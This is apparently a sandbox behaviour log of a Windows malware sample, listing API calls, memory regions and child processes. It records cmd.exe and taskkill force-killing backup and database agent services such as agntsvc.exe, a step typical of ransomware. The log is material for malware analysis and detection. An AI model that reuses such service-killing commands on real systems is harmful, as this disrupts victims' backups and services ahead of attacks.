RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xa76) returned 0x417ce0 [0175.559] FreeEnvironmentStringsA (penv="=") returned 1 [0175.559] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0xffffffff) returned 0x0 [0176.625] GetExitCodeProcess (in: hProcess=0x9c, lpExitCode=0x19f694 | out: lpExitCode=0x19f694*=0x80) returned 1 [0176.626] CloseHandle (hObject=0x9c) returned 1 [0176.627] _vsnwprintf (in: _Buffer=0x19f77c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f69c | out: _Buffer="00000080") returned 8 [0176.627] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000080") returned 1 [0176.628] GetProcessHeap () returned 0x410000 [0176.628] RtlFreeHeap (HeapHandle=0x410000, Flags=0x0, BaseAddress=0x417ce0) returned 1 [0176.628] GetEnvironmentStringsW () returned 0x417ce0* [0176.628] GetProcessHeap () returned 0x410000 [0176.628] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xa9c) returned 0x41c718 [0176.629] FreeEnvironmentStringsA (penv="=") returned 1 [0176.629] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0176.629] GetProcessHeap () returned 0x410000 [0176.629] RtlFreeHeap (HeapHandle=0x410000, Flags=0x0, BaseAddress=0x41c718) returned 1 [0176.629] GetEnvironmentStringsW () returned 0x417ce0* [0176.629] GetProcessHeap () returned 0x410000 [0176.629] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xa9c) returned 0x41c718 [0176.630] FreeEnvironmentStringsA (penv="=") returned 1 [0176.630] GetProcessHeap () returned 0x410000 [0176.630] RtlFreeHeap (HeapHandle=0x410000, Flags=0x0, BaseAddress=0x41b1d0) returned 1 [0176.630] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f728 | out: lpAttributeList=0x19f728) [0176.630] _get_osfhandle (_FileHandle=1) returned 0x144 [0176.630] SetConsoleMode (hConsoleHandle=0x144, dwMode=0x0) returned 0 [0176.630] _get_osfhandle (_FileHandle=1) returned 0x144 [0176.630] GetConsoleMode (in: hConsoleHandle=0x144, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0176.630] _get_osfhandle (_FileHandle=0) returned 0x140 [0176.630] GetConsoleMode (in: hConsoleHandle=0x140, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0176.630] GetConsoleOutputCP () returned 0x1b5 [0176.632] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0176.632] SetThreadUILanguage (LangId=0x0) returned 0x409 [0176.633] exit (_Code=128) Thread: id = 220 os_tid = 0x558 Process: id = "37" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x4bf08000" os_pid = "0x11d0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "36" os_parent_pid = "0x1064" cmd_line = "taskkill /f /im agntsvc.exeagntsvc.exe " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2902 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2903 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2904 start_va = 0x40000 end_va = 0x43fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2905 start_va = 0x50000 end_va = 0x65fff monitored = 0 entry_point = 0x5de80 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\SysWOW64\\taskkill.exe" (normalized: "c:\\windows\\syswow64\\taskkill.exe") Region: id = 2906 start_va = 0x70000 end_va = 0x406ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 2907 start_va = 0x4070000 end_va = 0x4084fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004070000" filename = "" Region: id = 2908 start_va = 0x4090000 end_va = 0x40cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 2909 start_va = 0x40d0000 end_va = 0x410ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 2910 start_va = 0x4110000 end_va = 0x4110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004110000" filename = "" Region: id = 2911 start_va = 0x4120000 end_va = 0x4121fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 2912 start_va = 0x4200000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 2913 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2914 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2915 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2916 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2917 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 2918 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2919 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 2920 start_va = 0x4560000 end_va = 0x456ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004560000" filename = "" Region: id = 2921 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2922 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2923 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2924 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2925 start_va = 0x4570000 end_va = 0x47dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004570000" filename = "" Region: id = 2926 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2927 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2928 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2929 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2930 start_va = 0x4130000 end_va = 0x41edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2931 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2932 start_va = 0x74650000 end_va = 0x746cafff monitored = 0 entry_point = 0x7466e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2933 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2934 start_va = 0x4400000 end_va = 0x443ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 2935 start_va = 0x4440000 end_va = 0x447ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004440000" filename = "" Region: id = 2936 start_va = 0x76ae0000 end_va = 0x76b23fff monitored = 0 entry_point = 0x76af9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2937 start_va = 0x75260000 end_va = 0x7530cfff monitored = 0 entry_point = 0x75274f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2938 start_va = 0x74450000 end_va = 0x7446dfff monitored = 0 entry_point = 0x7445b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2939 start_va = 0x74440000 end_va = 0x74449fff monitored = 0 entry_point = 0x74442a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2940 start_va = 0x74590000 end_va = 0x745e7fff monitored = 0 entry_point = 0x745d25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2941 start_va = 0x77450000 end_va = 0x77596fff monitored = 0 entry_point = 0x77461cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2942 start_va = 0x76b30000 end_va = 0x76c7efff monitored = 0 entry_point = 0x76be6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2943 start_va = 0x753c0000 end_va = 0x75451fff monitored = 0 entry_point = 0x753f8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 2944 start_va = 0x6cda0000 end_va = 0x6cda7fff monitored = 0 entry_point = 0x6cda17b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 2945 start_va = 0x6cd80000 end_va = 0x6cd95fff monitored = 0 entry_point = 0x6cd821d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 2946 start_va = 0x77290000 end_va = 0x7744cfff monitored = 0 entry_point = 0x77372a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2947 start_va = 0x75310000 end_va = 0x7536efff monitored = 0 entry_point = 0x75314af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 2948 start_va = 0x77240000 end_va = 0x77284fff monitored = 0 entry_point = 0x7725de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 2949 start_va = 0x6ccb0000 end_va = 0x6cceefff monitored = 0 entry_point = 0x6ccc46c0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 2950 start_va = 0x6c9a0000 end_va = 0x6cadefff monitored = 0 entry_point = 0x6c9cd880 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 2951 start_va = 0x6cd60000 end_va = 0x6cd7bfff monitored = 0 entry_point = 0x6cd64720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 2952 start_va = 0x6cd50000 end_va = 0x6cd59fff monitored = 0 entry_point = 0x6cd528d0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 2953 start_va = 0x4480000 end_va = 0x454ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004480000" filename = "" Region: id = 2954 start_va = 0x4480000 end_va = 0x44a9fff monitored = 0 entry_point = 0x4485680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2955 start_va = 0x4540000 end_va = 0x454ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004540000" filename = "" Region: id = 2956 start_va = 0x47e0000 end_va = 0x4967fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000047e0000" filename = "" Region: id = 2957 start_va = 0x74ea0000 end_va = 0x74ecafff monitored = 0 entry_point = 0x74ea5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2958 start_va = 0x4970000 end_va = 0x4af0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004970000" filename = "" Region: id = 2959 start_va = 0x4b00000 end_va = 0x5efffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b00000" filename = "" Region: id = 2960 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2961 start_va = 0x41f0000 end_va = 0x41f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041f0000" filename = "" Region: id = 2962 start_va = 0x4480000 end_va = 0x4484fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui") Region: id = 2963 start_va = 0x4490000 end_va = 0x4490fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004490000" filename = "" Region: id = 2964 start_va = 0x44a0000 end_va = 0x44a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044a0000" filename = "" Region: id = 2965 start_va = 0x5f00000 end_va = 0x6236fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2966 start_va = 0x4570000 end_va = 0x4659fff monitored = 0 entry_point = 0x45ad650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2967 start_va = 0x46e0000 end_va = 0x47dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046e0000" filename = "" Region: id = 2968 start_va = 0x44b0000 end_va = 0x44b3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044b0000" filename = "" Region: id = 2969 start_va = 0x4570000 end_va = 0x464ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 2970 start_va = 0x76e20000 end_va = 0x76e2bfff monitored = 0 entry_point = 0x76e23930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 2971 start_va = 0x44c0000 end_va = 0x44c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044c0000" filename = "" Region: id = 2972 start_va = 0x76c80000 end_va = 0x76d03fff monitored = 0 entry_point = 0x76ca6220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 2973 start_va = 0x44d0000 end_va = 0x44d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044d0000" filename = "" Region: id = 2974 start_va = 0x6cca0000 end_va = 0x6ccacfff monitored = 0 entry_point = 0x6cca3520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 2975 start_va = 0x6cc30000 end_va = 0x6cc96fff monitored = 0 entry_point = 0x6cc4b610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 2976 start_va = 0x740f0000 end_va = 0x7410afff monitored = 0 entry_point = 0x740f9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 2977 start_va = 0x6cbe0000 end_va = 0x6cc23fff monitored = 0 entry_point = 0x6cbfaaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 2978 start_va = 0x44e0000 end_va = 0x451ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044e0000" filename = "" Region: id = 2979 start_va = 0x4650000 end_va = 0x468ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004650000" filename = "" Region: id = 2980 start_va = 0x4690000 end_va = 0x46cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004690000" filename = "" Region: id = 2981 start_va = 0x6240000 end_va = 0x627ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006240000" filename = "" Region: id = 2982 start_va = 0x6280000 end_va = 0x62bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006280000" filename = "" Region: id = 2983 start_va = 0x62c0000 end_va = 0x62fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000062c0000" filename = "" Region: id = 2984 start_va = 0x6cbc0000 end_va = 0x6cbd0fff monitored = 0 entry_point = 0x6cbc8fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 2985 start_va = 0x6c8e0000 end_va = 0x6c99efff monitored = 0 entry_point = 0x6c911e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 2987 start_va = 0x4520000 end_va = 0x4525fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004520000" filename = "" Thread: id = 221 os_tid = 0xb1c Thread: id = 222 os_tid = 0xd60 Thread: id = 223 os_tid = 0x884 Thread: id = 224 os_tid = 0x974 Thread: id = 225 os_tid = 0x1130 Process: id = "38" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x304a7000" os_pid = "0x188" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x110c" cmd_line = "cmd.exe /c \"taskkill /f /im agntsvc.exeencsvc.exe \"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2989 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2990 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2991 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2992 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2993 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2994 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2995 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2996 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2997 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2998 start_va = 0xf10000 end_va = 0xf61fff monitored = 1 entry_point = 0xf24fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 2999 start_va = 0xf70000 end_va = 0x4f6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 3000 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3001 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3002 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3003 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3004 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 3005 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3006 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 3007 start_va = 0x510000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3008 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3009 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3010 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3011 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3012 start_va = 0x520000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 3013 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3014 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3015 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3016 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3017 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3018 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3019 start_va = 0x4c0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 3020 start_va = 0x6a0000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 3021 start_va = 0x520000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 3022 start_va = 0x5a0000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 3023 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3024 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3025 start_va = 0x7a0000 end_va = 0xad6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 226 os_tid = 0xb0c [0177.431] GetModuleHandleA (lpModuleName=0x0) returned 0xf10000 [0177.431] __set_app_type (_Type=0x1) [0177.431] __p__fmode () returned 0x74974d6c [0177.431] __p__commode () returned 0x74975b1c [0177.431] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf25200) returned 0x0 [0177.431] __getmainargs (in: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0, _DoWildCard=0, 